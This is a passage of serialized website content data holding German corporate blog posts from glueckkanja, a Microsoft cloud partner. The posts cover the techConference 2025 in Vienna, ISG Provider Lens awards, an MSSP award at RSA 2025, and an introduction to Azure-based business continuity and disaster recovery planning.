3;",[19171,19177],{"d":19178,"transform":19174,"style":19175},"M33.79,33.79v-30a2,2,0,0,0-2-2h-30","\n        ",[1541,19181],{"className":19182},[19136,19137],[810,19184,19186],{"id":19185},"noch-ein-highlight-unser-webcast-live-aus-wien","Noch ein Highlight: unser Webcast live aus Wien.",[806,19188,816],{},[806,19190,19191,19192,19195],{},"Kurz nach der techConference geht es direkt weiter: ",[1736,19193,19194],{},"Am 12. Juni um 11:00 Uhr"," senden wir live aus Wien unseren Webcast \"Windows 365: Klartext zur Praxis und Lizenzierung\". Gemeinsam mit Andreas Leitgeb von Microsoft Österreich liefert Timo Herzig (glueckkanja) in 45 Minuten alles, was IT-Entscheider jetzt über Windows 365 wissen müssen – kompakt, verständlich, praxisnah.",[806,19197,19198],{},"Im Fokus: reale Use Cases, aktuelle Lizenzmodelle, Einsatzszenarien für Österreich – plus eine Live-Demo, wie der Einstieg mit einem Link Device in der Praxis aussieht. Im Anschluss beantworten wir live eure Fragen im Q&A.",[1541,19200,1909,19202,1909,19212,1905],{"className":19201},[19102],[1541,19203,1913,19205,1913,19209,1909],{"className":19204},[19106],[1449,19206],{"src":19207,"alt":19208},"https://res.cloudinary.com/c4a8/image/upload/events/andreas-leitgeb.jpg","Andreas Leitgeb",[1541,19210,19208],{"className":19211},[19113],[1541,19213,1913,19215,1913,19219,1909],{"className":19214},[19106],[1449,19216],{"src":19217,"alt":19218},"https://res.cloudinary.com/c4a8/image/upload/events/Timo.Herzig.648.jpg","Timo Herzig",[1541,19220,19218],{"className":19221},[19113],[1541,19223],{"className":19224},[19136,19137],[806,19226,19227],{},"Neugierig geworden? Dann kommt bei uns am Stand vorbei. 
Wir freuen uns auf den Austausch – über Cloud, Resilienz und alles, was euch sonst gerade umtreibt.",{"title":863,"searchDepth":864,"depth":864,"links":19229},[19230,19231,19232],{"id":19052,"depth":864,"text":19053},{"id":19079,"depth":864,"text":19080},{"id":19185,"depth":864,"text":19186},{"seoTitle":19234,"titleClass":873,"date":19235,"categories":19236,"blogtitlepic":19237,"socialimg":19238,"customExcerpt":19239,"keywords":19240,"hreflang":19241,"footer":19246,"contactInContent":19247,"scripts":19281},"Wie wir bei der techConference 2025 gleich dreifach Geschichte schreiben","2025-05-25",[876],"head-tech-conference.png","/blog/heads/head-tech-conference.png","Was passiert, wenn die Cloud in Österreich landet? Wenn Tech-Entscheider, Cybersecurity-Pioniere und Microsoft-Profis aufeinandertreffen? Dann ist techConference – und wir mittendrin. Nicht nur als Platinum Partner, nicht nur mit Booth und Session. Sondern auch als offizieller Launchpartner Virtualisierung für die neue Microsoft Cloudregion Österreich.","Microsoft Partner Schweiz, Managed Services Azure Schweiz, Microsoft 365 Services Schweiz, IT Dienstleister Schweiz, Cloud Services Schweiz, ISG Provider Lens Schweiz, glueckkanja Schweiz, Microsoft Cloud Schweiz, Rising Star ISG 2025, IT Sicherheit Schweiz, Digitalisierung Unternehmen Schweiz, Azure Services Bern, Microsoft 365 Beratung Schweiz, glueckkanja, glueckkanja Bern, glueckkanja Microsoft Services",[19242,19244],{"lang":953,"href":19243},"/blog/corporate/2025/05/tech-conference-2025-en",{"lang":956,"href":19245},"/blog/corporate/2025/05/tech-conference-2025-es",{"noMargin":508},{"quote":508,"infos":19248},{"bgColor":883,"headline":19249,"subline":19250,"level":810,"textStyling":887,"flush":888,"person":19251,"form":19260},"Studie anfordern","Du möchtest tiefer in die Studienergebnisse eintauchen? 
Dann melde dich gern bei uns – wir schicken dir die vollständige ISG-Übersicht mit unseren Skills und Stärken zu.",{"image":19252,"cloudinary":508,"alt":1107,"name":1107,"quotee":1107,"quoteeTitle":19253,"quote":19254,"detailsHeader":895,"details":19255},"/people/people-michael-breither.jpg","COO","Die Rising Star-Auszeichnung zeigt, dass unser Ansatz auch in der Schweiz überzeugt: standardisierte, sichere Microsoft-Services – pragmatisch umgesetzt und mit echtem Mehrwert für unsere Kunden.",[19256,19257],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},"sales@glueckkanja.com","mailto:sales@glueckkanja.com",{"ctaText":905,"cta":19261,"method":870,"action":908,"fields":19262},{"skin":907},[19263,19264,19266,19268,19271,19272,19274,19275,19277,19279,19280],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},"Bitte Namen eingeben.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},"Bitte Unternehmen eingeben.",{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},"Email-Adresse*","Bitte E-Mail-Adresse eingeben.",{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},"Deine Daten werden zur Bearbeitung und Beantwortung deiner Anfrage bei uns gespeichert. 
Weitere Informationen zum Datenschutz findest du in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":19276},"CH",{"type":911,"id":942,"value":19278},"Form: Blog ISG Switzerland | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508},"/posts/2025-05-25-tech-conference-2025",{"title":19046,"description":863},"posts/2025-05-25-tech-conference-2025",[19286,19287],"Austria","Event","G9DtkThLljKUBNle58uZR2t6KXclMLgUUxLm-oCG4co",{"id":19290,"title":19291,"author":19292,"body":19293,"cta":764,"description":19297,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19388,"moment":19390,"navigation":508,"path":19437,"seo":19438,"stem":19439,"tags":19440,"webcast":749,"__hash__":19442},"content_de/posts/2025-05-08-isg-germany-2025.md","Vier gewinnt. glueckkanja erneut Leader bei ISG",[801],{"type":803,"value":19294,"toc":19381},[19295,19298,19301,19305,19307,19310,19314,19316,19322,19327,19331,19333,19339,19344,19348,19350,19356,19361,19365,19367,19373,19378],[806,19296,19297],{},"Einmal ist keinmal, sagt man. Zweimal ist doppelt gut, und erst beim Triple geht’s mit dem Zählen los. So gesehen gehören wir seit diesem Jahr zum Establishment der ISG Provider Lens™-Studie: Denn glueckkanja wurde nach 2021, 2023 und 2024 auch 2025 wieder als Leader im Bereich Microsoft 365 Services und Managed Azure ausgezeichnet.",[806,19299,19300],{},"Als langjähriger Microsoft-Partner bringen wir Unternehmen weltweit in die Cloud – strategisch, sicher und immer mit einem klaren Blick aufs Machbare. Damit leisten wir einen wichtigen Beitrag zur globalen IT-Sicherheit und fördern den innovativen Fortschritt in einer Vielzahl von Geschäftsfeldern. 
Wir freuen uns, dass diese Leistung auch 2025 erneut von der ISG-Studie anerkannt wurde.",[810,19302,19304],{"id":19303},"isg-provider-lens-studie-2025","ISG Provider Lens™ Studie 2025",[806,19306,816],{},[806,19308,19309],{},"Mit der \"Microsoft Cloud Ecosystem\"-Studie liefert ISG im Rahmen seiner Provider Lens™-Reihe fundierte Einblicke, die Unternehmen bei ihrer strategischen Ausrichtung – von der Positionierung über Partnerschaften bis hin zu Go-to-Market-Ansätzen – unterstützen. Dabei werden die Leistungen der einzelnen Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet und in die vier Quadranten Product Challenger, Contender, Market Challenger und Leader eingeteilt. So viel zur Studie selbst – kommen wir jetzt zu unseren Studienergebnissen!",[810,19311,19313],{"id":19312},"glueckkanja-ist-leader-microsoft-365-services-midmarket","glueckkanja ist Leader Microsoft 365 Services (Midmarket)",[806,19315,816],{},[806,19317,19318],{},[1449,19319],{"alt":19320,"src":19321},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[806,19323,19324],{},[4655,19325,19326],{},"\"glueckkanja treibt die Cloud-Transformation voran, integriert Microsoft 365 und Windows 365 effizient und setzt auf Automatisierung, um IT-Prozesse zu optimieren und die Sicherheit zu gewährleisten!\"",[810,19328,19330],{"id":19329},"glueckkanja-ist-leader-microsoft-365-services-large-accounts","glueckkanja ist Leader Microsoft 365 Services (Large Accounts)",[806,19332,816],{},[806,19334,19335],{},[1449,19336],{"alt":19337,"src":19338},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[806,19340,19341],{},[4655,19342,19343],{},"\"glueckkanja optimiert komplexe IT-Landschaften, integriert Microsoft 365 und Windows 365 nahtlos und setzt auf 
Automatisierung für maximale Skalierbarkeit, Sicherheit und Effizienz.\"",[810,19345,19347],{"id":19346},"glueckkanja-ist-leader-managed-services-for-azure-midmarket","glueckkanja ist Leader Managed Services for Azure (Midmarket)",[806,19349,816],{},[806,19351,19352],{},[1449,19353],{"alt":19354,"src":19355},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[806,19357,19358],{},[4655,19359,19360],{},"\"glueckkanja ermöglicht sichere, skalierbare Cloud-Strukturen, die Risiken minimieren und die Effizienz steigern. Durch Automatisierung und vorausschauende Governance gewinnen Unternehmen Stabilität, Kontrolle und Zukunftssicherheit.\"",[810,19362,19364],{"id":19363},"glueckkanja-ist-leader-managed-services-for-azure-large-accounts","glueckkanja ist Leader Managed Services for Azure (Large Accounts)",[806,19366,816],{},[806,19368,19369],{},[1449,19370],{"alt":19371,"src":19372},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[806,19374,19375],{},[4655,19376,19377],{},"\"glueckkanja gestaltet die Cloud-Zukunft mit Automatisierung, Governance und Nachhaltigkeit. Durch Infrastructure as Code und iterative Optimierung entstehen resiliente, skalierbare und wirtschaftlich effiziente Lösungen.\"",[806,19379,19380],{},"An dieser Stelle sagen wir herzlich Danke für das viele Lob. 
Wenn du Lust hast, tiefer in die Studienergebnisse einzutauchen, sag einfach Bescheid – wir schicken dir gerne die vollständige ISG-Übersicht zu.",{"title":863,"searchDepth":864,"depth":864,"links":19382},[19383,19384,19385,19386,19387],{"id":19303,"depth":864,"text":19304},{"id":19312,"depth":864,"text":19313},{"id":19329,"depth":864,"text":19330},{"id":19346,"depth":864,"text":19347},{"id":19363,"depth":864,"text":19364},{"seoTitle":19389,"titleClass":873,"date":19390,"categories":19391,"blogtitlepic":19392,"socialimg":19393,"customExcerpt":19394,"keywords":19395,"hreflang":19396,"footer":19401,"contactInContent":19402,"textImageTeaser":19425},"ISG 2025: glueckkanja erneut Leader für Managed Services for Azure und Microsoft 365 Services","2025-05-08",[876],"head-isg-2025.png","/blog/heads/head-isg-2025.png","Die ISG Provider Lens™-Studie 2025 bestätigt glueckkanja erneut als Leader in den Kategorien Managed Services for Azure und Microsoft 365 Services. Ausgezeichnet wurde in beiden Marktsegmenten: Midmarket und Large Accounts. 
Damit bestätigt sich, was sich in den letzten Jahren abgezeichnet hat: Wer Standardisierung, Automatisierung und Skalierung für Microsoft-Umgebungen ernst meint, kommt an glueckkanja nicht vorbei.","Microsoft Partner Deutschland, Managed Services Azure Deutschland, Microsoft 365 Services Deutschland, IT Dienstleister Deutschland, Cloud Services Deutschland, ISG Provider Lens Deutschland, glueckkanja Deutschland, Microsoft Cloud Deutschland, ISG Leader 2025, IT Sicherheit Deutschland, Digitalisierung Unternehmen Deutschland, Azure Services Deutschland, Microsoft 365 Beratung Deutschland, glueckkanja, glueckkanja Microsoft Services, ISG Auszeichnung Microsoft",[19397,19399],{"lang":953,"href":19398},"/blog/corporate/2025/05/isg-germany-2025-en",{"lang":956,"href":19400},"/blog/corporate/2025/05/isg-germany-2025-es",{"noMargin":508},{"quote":508,"infos":19403},{"bgColor":883,"headline":19249,"subline":19250,"level":810,"textStyling":887,"flush":888,"person":19404,"form":19409},{"image":19252,"cloudinary":508,"alt":1107,"name":1107,"quotee":1107,"quoteeTitle":19253,"quote":19405,"detailsHeader":895,"details":19406},"Die wiederholte Auszeichnung durch ISG bestätigt unseren Kurs: standardisierte, skalierbare Services für Microsoft-Plattformen – mit echtem Mehrwert für unsere 
Kunden.",[19407,19408],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19410,"method":870,"action":908,"fields":19411},{"skin":907},[19412,19413,19414,19415,19416,19417,19418,19419,19421,19423,19424],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":19420},"DE",{"type":911,"id":942,"value":19422},"Form: Blog ISG Germany | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"image":19426,"cloudinary":508,"alt":19427,"bgColor":19428,"offset":749,"list":19429,"left":749,"float":749,"firstColWidth":2135,"secondColWidth":2147,"copyClasses":19433,"headline":19434,"subline":19435,"spacing":19436},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens","#fcd116",[19430],{"ctaText":19431,"ctaHref":19432,"ctaType":3868},"Mehr Infos","/de/blog/corporate/2025/05/isg-switzerland-2025","richtext","\u003Cp>Übrigens, in der Schweiz sind wir Rising Star!\u003Cbr />Merci, ISG!\u003C/p>","\u003Cp>Erfahre jetzt alles über unsere ISG-Ergebnisse in der Schweiz.\u003C/p>","space-top-2 space-bottom-2","/posts/2025-05-08-isg-germany-2025",{"title":19291,"description":19297},"posts/2025-05-08-isg-germany-2025",[963,19441],"ISG","V50zhAOdZjmcoM89VEoeFypia5Tbocu4sQ__icPmW_M",{"id":19444,"title":19445,"author":19446,"body":19447,"cta":764,"description":19451,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19504,"moment":19390,"navigation":508,"path":19545,"seo":19546,"stem":19547,"tags":19548,"webcast":749,"__hash__":19549},"content_de/posts/2025-05-08-isg-switzerland-2025.md","Schweiz legt nach. 
glueckkanja wird ISG Rising Star",[801],{"type":803,"value":19448,"toc":19499},[19449,19452,19455,19457,19459,19462,19466,19468,19474,19479,19483,19485,19491,19496],[806,19450,19451],{},"Bern ist bekannt für seine beeindruckende Altstadt, den Zeitglockenturm, das Bundeshaus – und natürlich den Rosengarten. Jetzt kommt ein neues Highlight dazu: glueckkanja Schweiz wurde in der aktuellen ISG Provider Lens™-Studie als „Rising Star“ ausgezeichnet – für unsere Microsoft 365 Services und Managed Services for Azure.",[806,19453,19454],{},"Seit 2024 sind wir mit glueckkanja auch in Bern vor Ort. Als erfahrener Microsoft-Partner begleiten wir von dort aus Schweizer Unternehmen in die Cloud – strategisch, sicher und mit einem klaren Blick aufs Machbare. So stärken wir seit rund zwölf Monaten die IT-Sicherheit im Schweizer Wirtschaftsraum und bringen Innovation in verschiedenste Branchen. Umso mehr freut es uns, dass unsere Arbeit nun auch von der ISG Provider Lens™ gewürdigt wurde.",[810,19456,19304],{"id":19303},[806,19458,816],{},[806,19460,19461],{},"Mit der \"Microsoft Cloud Ecosystem\"-Studie liefert ISG im Rahmen seiner Provider Lens™-Reihe fundierte Einblicke, die Unternehmen bei ihrer strategischen Ausrichtung – von der Positionierung über Partnerschaften bis hin zu Go-to-Market-Ansätzen – unterstützen. Dabei werden die Leistungen der einzelnen Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet und in die vier Quadranten Product Challenger, Contender, Market Challenger und Leader eingeteilt. 
So viel zur Theorie – jetzt zu unseren Ergebnissen!",[810,19463,19465],{"id":19464},"glueckkanja-ist-rising-star-microsoft-365-services","glueckkanja ist Rising Star Microsoft 365 Services",[806,19467,816],{},[806,19469,19470],{},[1449,19471],{"alt":19472,"src":19473},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[806,19475,19476],{},[4655,19477,19478],{},"\"glueckkanja unterstützt Schweizer Unternehmen bei der sicheren Cloud-Transformation, integriert Microsoft 365 und Windows 365 und optimiert IT-Prozesse durch Automatisierung und Skalierbarkeit.\"",[810,19480,19482],{"id":19481},"glueckkanja-ist-rising-star-managed-services-for-azure","glueckkanja ist Rising Star Managed Services for Azure",[806,19484,816],{},[806,19486,19487],{},[1449,19488],{"alt":19489,"src":19490},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[806,19492,19493],{},[4655,19494,19495],{},"\"glueckkanja ist ein Rising Star im Schweizer Markt für Managed Services für Azure. Mit technologischem Weitblick, lokaler Präsenz und bewiesener Leistungsfähigkeit stärkt das Unternehmen Security, Automatisierung und Skalierbarkeit für zukunftssichere Cloud-Strategien.\"",[806,19497,19498],{},"Dafür sagen wir „Merci vielmals\" und stoßen jetzt mit einem Bärner Müntschi darauf an. 
Solltest du Lust haben, tiefer in die Studienergebnisse einzusteigen, findest du hier eine komplette ISG-Übersicht unserer Skills und Stärken.",{"title":863,"searchDepth":864,"depth":864,"links":19500},[19501,19502,19503],{"id":19303,"depth":864,"text":19304},{"id":19464,"depth":864,"text":19465},{"id":19481,"depth":864,"text":19482},{"seoTitle":19505,"titleClass":873,"date":19390,"categories":19506,"blogtitlepic":19507,"socialimg":19508,"customExcerpt":19509,"keywords":19240,"hreflang":19510,"footer":19515,"contactInContent":19516,"textImageTeaser":19538},"glueckkanja Schweiz als ISG „Rising Star“ 2025 für Microsoft 365 & Azure Services",[876],"head-isg-ch-2025.png","/blog/heads/head-isg-ch-2025.png","glueckkanja Schweiz wurde von ISG als „Rising Star“ in den Kategorien Microsoft 365 Services und Managed Services for Azure ausgezeichnet. Eine Anerkennung, die zeigt: Unsere Standards, unser Anspruch und unsere Services setzen Maßstäbe – auch über Grenzen hinweg.",[19511,19513],{"lang":953,"href":19512},"/blog/corporate/2025/05/isg-switzerland-2025-en",{"lang":956,"href":19514},"/blog/corporate/2025/05/isg-switzerland-2025-es",{"noMargin":508},{"quote":508,"infos":19517},{"bgColor":883,"headline":19249,"subline":19250,"level":810,"textStyling":887,"flush":888,"person":19518,"form":19524},{"image":19252,"cloudinary":508,"alt":1107,"name":1107,"quotee":1107,"quoteeTitle":19253,"quote":19254,"detailsHeader":895,"details":19519},[19520,19523],{"text":19521,"href":19522,"details":899,"icon":900},"+41 31 5611900","tel:+41 31 
5611900",{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19525,"method":870,"action":908,"fields":19526},{"skin":907},[19527,19528,19529,19530,19531,19532,19533,19534,19535,19536,19537],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":19276},{"type":911,"id":942,"value":19278},{"type":911,"id":945,"value":946},{"type":911,"id":948},{"image":19539,"cloudinary":508,"alt":19427,"bgColor":19428,"offset":749,"list":19540,"left":749,"float":749,"firstColWidth":2135,"secondColWidth":2147,"copyClasses":19433,"headline":19543,"subline":19544,"spacing":19436},"/logos/isg-provider-lens-leader-de.png",[19541],{"ctaText":19431,"ctaHref":19542,"ctaType":3868},"/blog/corporate/2025/05/isg-germany-2025","\u003Cp>Übrigens, in Deutschland sind wir Leader in den Bereichen Microsoft 365 und Managed Azure!\u003Cbr />Danke, ISG!\u003C/p>","\u003Cp>Erfahre jetzt alles über unsere ISG-Ergebnisse in Deutschland.\u003C/p>","/posts/2025-05-08-isg-switzerland-2025",{"title":19445,"description":19451},"posts/2025-05-08-isg-switzerland-2025",[963,19441],"vDqsKE_-Jf8wxHB7gIDdtf0em43ZKY5NrcT26aKwHoE",{"id":19551,"title":19552,"author":19553,"body":19554,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19610,"moment":19611,"navigation":508,"path":19623,"seo":19624,"stem":19625,"tags":19626,"webcast":749,"__hash__":19629},"content_de/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja weiterhin unter den Top 5 MSSPs 
weltweit",[801],{"type":803,"value":19555,"toc":19606},[19556,19560,19562,19565,19568,19571,19574,19585,19588,19591,19594,19598,19600,19603],[810,19557,19559],{"id":19558},"dreimal-in-folge-glueckkanja-zählt-zur-security-elite","Dreimal in Folge: glueckkanja zählt zur Security-Elite",[806,19561,816],{},[806,19563,19564],{},"Zum dritten Mal in Folge gehören wir zu den fünf besten Managed Microsoft Security Providern weltweit. Ein Triple, über das wir uns riesig freuen. CEO Christian Kanja und Security Lead Jan Geisbauer waren persönlich in San Francisco vor Ort, um diese Auszeichnung gemeinsam mit der Microsoft Intelligent Security Association (MISA) und der internationalen Security-Community zu feiern. RSA, Golden Gate Bridge, roter Teppich – alles dabei.",[806,19566,19567],{},"Und weil Innovation nicht nur auf der Bühne stattfindet, haben Christian und Jan auch Zukunftsluft geschnuppert: im selbstfahrenden Taxi durch die Straßen von San Francisco. Ohne Fahrer, aber mit jeder Menge Begeisterung – ein Erlebnis, das perfekt zum Spirit der RSA passte. Genau das ist auch unser Anspruch in der Cybersecurity: Vertrauen entsteht, wenn Systeme halten, was sie versprechen.",[806,19569,19570],{},"Die Microsoft Security Excellence Awards gehören zu den wichtigsten Auszeichnungen der Branche. Sie würdigen Partner, die mit Innovation und Servicequalität Standards setzen. 
Dass wir 2025 erneut als einer der besten Managed Security Service Provider ausgezeichnet wurden, ist eine besondere Bestätigung unserer Arbeit – und ein Meilenstein für unser gesamtes Team.",[806,19572,19573],{},"Was uns dahin gebracht hat:",[2738,19575,19576,19579,19582],{},[2741,19577,19578],{},"87 % unserer Kunden bewerten unsere technische Expertise auf höchstem Niveau",[2741,19580,19581],{},"94 % loben unsere 24/7-Services",[2741,19583,19584],{},"100 % sind mit der Gesamterfahrung zufrieden",[806,19586,19587],{},"Starke Ergebnisse, die zeigen: Als Team leisten wir Außergewöhnliches.",[806,19589,19590],{},"Ein großes Dankeschön an alle, die diesen Erfolg möglich gemacht haben – an Microsoft und die Microsoft Intelligent Security Association (MISA) für die enge Partnerschaft und das Vertrauen, an unsere Kunden für ihre Treue und an unser CSOC-Team, das Tag für Tag Spitzenleistung bringt.",[806,19592,19593],{},"In einer starken Security-Community arbeiten die besten Köpfe zusammen – und genau diese Zusammenarbeit treibt uns weiter an.",[810,19595,19597],{"id":19596},"der-blick-nach-vorn","Der Blick nach vorn",[806,19599,816],{},[806,19601,19602],{},"Dieser Award ist für uns Ansporn und Verpflichtung zugleich. Wir bleiben dran: mit Innovation, Leidenschaft und dem Anspruch, Microsoft-Sicherheitslösungen auf höchstem Niveau bereitzustellen. 
Gemeinsam mit Microsoft, unseren Kunden und Partnern schreiben wir das nächste Kapitel unserer Erfolgsgeschichte.",[806,19604,19605],{},"glueckkanja – Security auf Champions-League-Niveau.",{"title":863,"searchDepth":864,"depth":864,"links":19607},[19608,19609],{"id":19558,"depth":864,"text":19559},{"id":19596,"depth":864,"text":19597},{"seoTitle":19552,"titleClass":873,"date":19611,"categories":19612,"blogtitlepic":19613,"socialimg":19614,"customExcerpt":19615,"keywords":19616,"hreflang":19617,"scripts":19622},"2025-04-29",[876],"head-mssp-finalist-2025","/socialimg/og-img-mssp-2025.png","Die Microsoft Security Excellence Awards gehören zu den bedeutendsten Auszeichnungen der Branche. Auf der RSA Conference 2025 in San Francisco wurden erneut Partner geehrt, die mit Innovation, Servicequalität und Engagement Maßstäbe setzen. Dass glueckkanja 2025 wieder als Finalist bei den „Security MSSP of the Year Awards“ ausgezeichnet wurde, freut uns riesig – und ist ein starkes Zeichen für die Arbeit, die unser gesamtes Team jeden Tag leistet.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Bester Microsoft Security Partner 2025, Microsoft MSSP Finalist 2025, Microsoft Security Award Gewinner, Cybersecurity Anbieter mit Microsoft-Technologie, Managed Security für Microsoft 365, Microsoft Intelligent Security Association (MISA) Partner, RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, MISA Partner Microsoft, Microsoft Sicherheitslösungen für Unternehmen, Cybersecurity Trends 
2025",[19618,19620],{"lang":953,"href":19619},"/blog/corporate/2025/03/mssp-2025-en",{"lang":956,"href":19621},"/blog/corporate/2025/03/mssp-2025-es",{"slick":508},"/posts/2025-04-29-rsa-mssp-2025",{"title":19552,"description":863},"posts/2025-04-29-rsa-mssp-2025",[963,19627,371,19628],"Microsoft","Misa","qJoeeOUV2zx9qs4ZL46QmQHMQ8v-0Adogq_DYF5tN38",{"id":19631,"title":19632,"author":19633,"body":19634,"cta":764,"description":19638,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19813,"moment":19815,"navigation":508,"path":19851,"seo":19852,"stem":19853,"tags":19854,"webcast":749,"__hash__":19857},"content_de/posts/2025-04-07-bcdr-management.md","Wenn Systeme ausfallen, zeigt sich, wie gut dein Plan wirklich ist",[1226],{"type":803,"value":19635,"toc":19804},[19636,19639,19645,19649,19651,19654,19657,19661,19663,19674,19677,19682,19686,19688,19691,19695,19697,19702,19710,19715,19723,19728,19736,19741,19749,19754,19762,19766,19768,19771,19776,19787,19791,19793,19796,19799],[806,19637,19638],{},"Moderne IT-Infrastrukturen sind verteilt, dynamisch und eng mit dem Geschäftserfolg verknüpft. Ausfälle einzelner Dienste oder ganzer Plattformen können schnell zu einem kritischen Risiko für Unternehmen werden – operativ wie reputativ.",[806,19640,19641,19644],{},[1736,19642,19643],{},"Business Continuity und Disaster Recovery (BCDR)"," sind heute kein optionales IT-Thema mehr, sondern eine unternehmerische Pflicht – sowohl aus regulatorischer Sicht als auch mit Blick auf Cyberresilienz und operative Stabilität.",[810,19646,19648],{"id":19647},"komplexität-wächst-resilienz-oft-nicht","Komplexität wächst – Resilienz oft nicht",[806,19650,816],{},[806,19652,19653],{},"Cloud-native Architekturen, hybride Szenarien, Self-Service-Initiativen aus Fachbereichen: Die IT-Landschaft wird zunehmend heterogener. 
In vielen Fällen fehlt jedoch eine übergreifende Struktur für Ausfallsicherheit.",[806,19655,19656],{},"Einzelne Applikationen entstehen schnell – häufig ohne konsistente Backup-, Recovery- oder Failover-Konzepte. Und genau hier entsteht eine gefährliche Lücke: Zwischen dem, was technisch möglich wäre, und dem, was tatsächlich umgesetzt wurde.",[810,19658,19660],{"id":19659},"regulatorische-anforderungen-nis2-und-dora-setzen-neue-maßstäbe","Regulatorische Anforderungen: NIS2 und DORA setzen neue Maßstäbe",[806,19662,816],{},[806,19664,19665,19666,19669,19670,19673],{},"Mit der ",[1736,19667,19668],{},"NIS2-Richtlinie (EU)"," und der ",[1736,19671,19672],{},"DORA-Verordnung"," (für den Finanzsektor) verschärfen sich die Anforderungen an betriebliche Resilienz und Wiederanlaufstrategien. Entscheidend ist nicht nur, ob du einen BCDR-Plan hast – sondern wie belastbar und testbar er ist.",[806,19675,19676],{},"In beiden Fällen gilt:",[3587,19678,19679],{},[806,19680,19681],{},"Verantwortung liegt beim Management – inklusive persönlicher Haftung bei Versäumnissen.",[810,19683,19685],{"id":19684},"azure-als-technologische-grundlage-für-bcdr-strategien","Azure als technologische Grundlage für BCDR-Strategien",[806,19687,816],{},[806,19689,19690],{},"Microsoft Azure bietet ein umfassendes Set an Tools, um moderne BCDR-Architekturen umzusetzen. 
Entscheidend ist die Fähigkeit, diese gezielt und abgestuft einzusetzen – je nach Kritikalität und Risikoprofil der jeweiligen Workloads, konkret anhand definierter Wiederanlaufziele (RTO) und tolerierbarer Datenverluste (RPO).",[1671,19692,19694],{"id":19693},"schlüsselkomponenten","Schlüsselkomponenten:",[806,19696,1536],{},[806,19698,19699],{},[1736,19700,19701],{},"Availability Zones & Region Pairs",[2738,19703,19704,19707],{},[2741,19705,19706],{},"Availability Zones: physisch getrennte Rechenzentren innerhalb einer Region – Region Pairs: eine geografisch entfernte Partnerregion für den Ausfall einer gesamten Region",[2741,19708,19709],{},"Hohe Verfügbarkeit durch redundante Infrastruktur – Zonen schützen vor dem Ausfall eines Rechenzentrums, Region Pairs vor regionalen Ausfällen",[806,19711,19712],{},[1736,19713,19714],{},"Azure Backup & Cross Region Restore",[2738,19716,19717,19720],{},[2741,19718,19719],{},"Sicherung von VMs, Datenbanken und Workloads mit Geo-Redundanz",[2741,19721,19722],{},"Wiederherstellung auch außerhalb der Primärregion möglich – setzt einen geo-redundanten Vault mit aktiviertem Cross Region Restore voraus; Backups sollten zudem unveränderlich (Immutable Vault) und per Soft Delete gegen Löschung geschützt sein, damit sie auch im Ransomware-Fall verfügbar bleiben",[806,19724,19725],{},[1736,19726,19727],{},"Azure Site Recovery",[2738,19729,19730,19733],{},[2741,19731,19732],{},"Replikation und orchestriertes Failover von VMs zwischen Regionen",[2741,19734,19735],{},"Failover-Tests in isolierten Umgebungen",[806,19737,19738],{},[1736,19739,19740],{},"Infrastructure as Code (IaC)",[2738,19742,19743,19746],{},[2741,19744,19745],{},"Automatisierte Wiederherstellung ganzer Infrastrukturen – ersetzt aber keine Datensicherung: Daten, Zustände und Secrets müssen separat gesichert werden",[2741,19747,19748],{},"Konsistente Deployments, Versionierbarkeit, Recovery-Templates",[806,19750,19751],{},[1736,19752,19753],{},"Microsoft Defender for Cloud",[2738,19755,19756,19759],{},[2741,19757,19758],{},"Kontinuierliches Monitoring und Schwachstellen-Management",[2741,19760,19761],{},"Frühzeitige Erkennung und 